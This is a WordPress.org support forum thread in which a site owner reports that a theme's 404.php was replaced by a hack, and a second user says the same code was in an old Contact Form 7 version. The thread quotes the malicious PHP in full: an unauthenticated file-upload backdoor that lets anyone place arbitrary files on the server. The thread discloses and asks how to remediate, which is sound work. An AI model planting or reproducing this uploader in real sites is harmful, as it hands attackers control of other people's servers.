404.php hack allows file upload | WordPress.org

peptid
(@peptid)

11 years, 2 months ago
Dear All,

I am writing this post notify users for a possible serious hack.

404.php file was hacked and it has been converted to
```
<?php
if(isset($_POST['Submit'])){
   $filedir = "";
   $maxfile = '2000000';

   $userfile_name = $_FILES['image']['name'];
   $userfile_tmp = $_FILES['image']['tmp_name'];
   if (isset($_FILES['image']['name'])) {
      $abod = $filedir.$userfile_name;
      @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input //type="Submit" name="Submit" value="Submit"></form>';
}
?>
```
That basically does this; if a content is not found, it redirects you to a page where you can upload files. Important point is you do not need to be a user or anything; anyone can upload any file to the server.

I basically deleted 404.php and apperantly this problem is solved. Yet, I would like to know what further steps I can take. Any help would be much appreciated.

PS: I am using Lucid Theme of Theme Forest and the site is hosted by GoDaddy.

Viewing 1 replies (of 1 total)

Rumeshkumar
(@rumeshin)

10 years, 8 months ago

your post helped me to fixed my problem. In my case, the code was inside contact-form-7 V 3.5.2.

https://wpvulndb.com/vulnerabilities/7022

Gonna update now.

Viewing 1 replies (of 1 total)

The topic ‘404.php hack allows file upload’ is closed to new replies.

Tags

1 reply
2 participants
Last reply from: Rumeshkumar
Last activity: 10 years, 8 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics